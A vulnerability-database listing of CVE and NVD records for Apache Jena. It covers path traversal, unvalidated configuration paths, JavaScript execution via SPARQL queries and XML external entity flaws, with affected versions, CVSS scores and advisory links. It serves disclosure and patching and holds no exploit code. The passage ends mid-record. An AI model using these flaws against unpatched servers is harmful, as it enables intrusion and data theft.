Search criteria
18 vulnerabilities found for jena by apache
FKIE_CVE-2025-50151
Vulnerability from fkie_nvd - Published: 2025-07-21 10:15 - Updated: 2025-11-04 22:16
Severity ?
Summary
File access paths in configuration files uploaded by users with administrator access are not validated.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2C804A9-87A4-4936-9F6B-F84CEB5B2580",
"versionEndExcluding": "5.5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "File access paths in configuration files uploaded by users with administrator access are not validated.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload."
},
{
"lang": "es",
"value": "Las rutas de acceso a los archivos de configuraci\u00f3n cargados por usuarios con acceso de administrador no se validan. Este problema afecta a Apache Jena hasta la versi\u00f3n 5.4.0. Se recomienda actualizar a la versi\u00f3n 5.5.0, que no permite la carga de configuraciones arbitrarias."
}
],
"id": "CVE-2025-50151",
"lastModified": "2025-11-04T22:16:20.113",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2025-07-21T10:15:25.837",
"references": [
{
"source": "security@apache.org",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/12gks5z40gh9bszn1xk8mz34gz586xss"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/2"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2025-49656
Vulnerability from fkie_nvd - Published: 2025-07-21 10:15 - Updated: 2025-11-04 22:16
Severity ?
Summary
Users with administrator access can create databases files outside the files area of the Fuseki server.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which fixes the issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2C804A9-87A4-4936-9F6B-F84CEB5B2580",
"versionEndExcluding": "5.5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Users with administrator access can create databases files outside the files area of the Fuseki server.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which fixes the issue."
},
{
"lang": "es",
"value": "Los usuarios con acceso de administrador pueden crear archivos de bases de datos fuera del \u00e1rea de archivos del servidor Fuseki. Este problema afecta a Apache Jena hasta la versi\u00f3n 5.4.0. Se recomienda actualizar a la versi\u00f3n 5.5.0, que soluciona el problema."
}
],
"id": "CVE-2025-49656",
"lastModified": "2025-11-04T22:16:18.450",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2025-07-21T10:15:25.440",
"references": [
{
"source": "security@apache.org",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/qmm21som8zct813vx6dfd1phnfro6mwq"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/1"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2023-32200
Vulnerability from fkie_nvd - Published: 2023-07-12 08:15 - Updated: 2024-11-21 08:02
Severity ?
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Summary
There is insufficient restrictions of called script functions in Apache Jena
versions 4.8.0 and earlier. It allows a
remote user to execute javascript via a SPARQL query.
This issue affects Apache Jena: from 3.7.0 through 4.8.0.
References
| URL | Tags | ||
|---|---|---|---|
| security@apache.org | https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z | Mailing List, Third Party Advisory | |
| security@apache.org | https://www.cve.org/CVERecord?id=CVE-2023-22665 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.cve.org/CVERecord?id=CVE-2023-22665 | Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16650542-BB5B-4572-862A-B3122A20D882",
"versionEndIncluding": "4.8.0",
"versionStartIncluding": "3.7.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "There is insufficient restrictions of called script functions in Apache Jena\n versions 4.8.0 and earlier. It allows a \nremote user to execute javascript via a SPARQL query.\nThis issue affects Apache Jena: from 3.7.0 through 4.8.0.\n\n"
}
],
"id": "CVE-2023-32200",
"lastModified": "2024-11-21T08:02:53.243",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2023-07-12T08:15:10.070",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
},
{
"source": "security@apache.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-917"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2023-22665
Vulnerability from fkie_nvd - Published: 2023-04-25 07:15 - Updated: 2024-11-21 07:45
Severity ?
Summary
There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query.
References
| URL | Tags | ||
|---|---|---|---|
| security@apache.org | http://www.openwall.com/lists/oss-security/2023/07/11/11 | Mailing List, Third Party Advisory | |
| security@apache.org | https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s | Issue Tracking, Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2023/07/11/11 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s | Issue Tracking, Mailing List |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16650542-BB5B-4572-862A-B3122A20D882",
"versionEndIncluding": "4.8.0",
"versionStartIncluding": "3.7.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query."
}
],
"id": "CVE-2023-22665",
"lastModified": "2024-11-21T07:45:09.793",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-04-25T07:15:08.137",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
},
{
"source": "security@apache.org",
"tags": [
"Issue Tracking",
"Mailing List"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mailing List"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-917"
}
],
"source": "security@apache.org",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-917"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2022-28890
Vulnerability from fkie_nvd - Published: 2022-05-05 09:15 - Updated: 2024-11-21 06:58
Severity ?
Summary
A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.
References
| URL | Tags | ||
|---|---|---|---|
| security@apache.org | https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878 | Mailing List, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878 | Mailing List, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:4.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BECFCBB8-D1E4-4413-86EB-FDD040601A4F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities."
},
{
"lang": "es",
"value": "Una vulnerabilidad en el analizador RDF/X de Apache Jena permite a un atacante causar la recuperaci\u00f3n de un DTD externo. Este problema afecta a Apache Jena versi\u00f3n 4.4.0 y a las versiones anteriores. Apache Jena versiones 4.2.x y 4.3.x no permiten entidades externas"
}
],
"id": "CVE-2022-28890",
"lastModified": "2024-11-21T06:58:08.750",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-05-05T09:15:08.140",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-611"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-39239
Vulnerability from fkie_nvd - Published: 2021-09-16 15:15 - Updated: 2024-11-21 06:18
Severity ?
Summary
A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*",
"matchCriteriaId": "188EB99D-6136-4B07-AE15-268D100A2039",
"versionEndIncluding": "4.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server."
},
{
"lang": "es",
"value": "Una vulnerabilidad en el procesamiento de XML en Apache Jena, en versiones hasta la 4.1.0, puede permitir a un atacante ejecutar un ataque de tipo XML External Entities (XXE), incluyendo la exposici\u00f3n del contenido de archivos locales a un servidor remoto"
}
],
"id": "CVE-2021-39239",
"lastModified": "2024-11-21T06:18:59.310",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-09-16T15:15:07.527",
"references": [
{
"source": "security@apache.org",
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"source": "security@apache.org",
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
},
{
"source": "security@apache.org",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-611"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2025-50151 (GCVE-0-2025-50151)
Vulnerability from cvelistv5 – Published: 2025-07-21 09:32 – Updated: 2025-11-04 21:11
VLAI?
Title
Apache Jena: Configuration files uploaded by administrative users are not check properly
Summary
File access paths in configuration files uploaded by users with administrator access are not validated.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.
Severity ?
No CVSS data available.
CWE
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
0 , ≤ 5.4.0
(semver)
|
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-50151",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-21T14:40:14.417556Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T14:41:06.294Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:11:34.502Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "5.4.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003eFile access paths in configuration files uploaded by users with administrator access are not validated.\u003c/div\u003e\u003cdiv\u003e\u003cp\u003eThis issue affects Apache Jena version up to 5.4.0.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.\u003c/p\u003e\u003cbr\u003e\u003c/div\u003e"
}
],
"value": "File access paths in configuration files uploaded by users with administrator access are not validated.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T09:32:30.334Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/12gks5z40gh9bszn1xk8mz34gz586xss"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache Jena: Configuration files uploaded by administrative users are not check properly",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-50151",
"datePublished": "2025-07-21T09:32:30.334Z",
"dateReserved": "2025-06-13T16:13:26.895Z",
"dateUpdated": "2025-11-04T21:11:34.502Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-49656 (GCVE-0-2025-49656)
Vulnerability from cvelistv5 – Published: 2025-07-21 09:30 – Updated: 2025-11-04 21:11
VLAI?
Title
Apache Jena: Administrative users can create files outside the server directory space via the admin UI
Summary
Users with administrator access can create databases files outside the files area of the Fuseki server.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which fixes the issue.
Severity ?
No CVSS data available.
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
0 , ≤ 5.4.0
(semver)
|
Credits
Noriaki Iwasaki; Cyber Defense Institute, Inc
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-49656",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-21T14:46:28.661133Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T14:47:08.462Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:11:14.792Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "5.4.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Noriaki Iwasaki; Cyber Defense Institute, Inc"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eUsers with administrator access can create databases files outside the files area of the Fuseki server.\u003c/p\u003e\u003cp\u003eThis issue affects Apache Jena version up to 5.4.0.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 5.5.0, which fixes the issue.\u003c/p\u003e"
}
],
"value": "Users with administrator access can create databases files outside the files area of the Fuseki server.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T09:30:32.715Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/qmm21som8zct813vx6dfd1phnfro6mwq"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache Jena: Administrative users can create files outside the server directory space via the admin UI",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-49656",
"datePublished": "2025-07-21T09:30:32.715Z",
"dateReserved": "2025-06-09T16:47:05.868Z",
"dateUpdated": "2025-11-04T21:11:14.792Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-32200 (GCVE-0-2023-32200)
Vulnerability from cvelistv5 – Published: 2023-07-12 07:49 – Updated: 2024-10-07 19:42
VLAI?
Title
Apache Jena: Exposure of execution in script engine expressions.
Summary
There is insufficient restrictions of called script functions in Apache Jena
versions 4.8.0 and earlier. It allows a
remote user to execute javascript via a SPARQL query.
This issue affects Apache Jena: from 3.7.0 through 4.8.0.
Severity ?
No CVSS data available.
CWE
- CWE-917 - Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
3.7.0 , ≤ 4.8.0
(semver)
|
Credits
s3gundo of Alibaba
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T15:10:23.901Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"related",
"x_transferred"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
},
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "jena",
"vendor": "apache",
"versions": [
{
"lessThanOrEqual": "4.8.0",
"status": "affected",
"version": "3.7.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
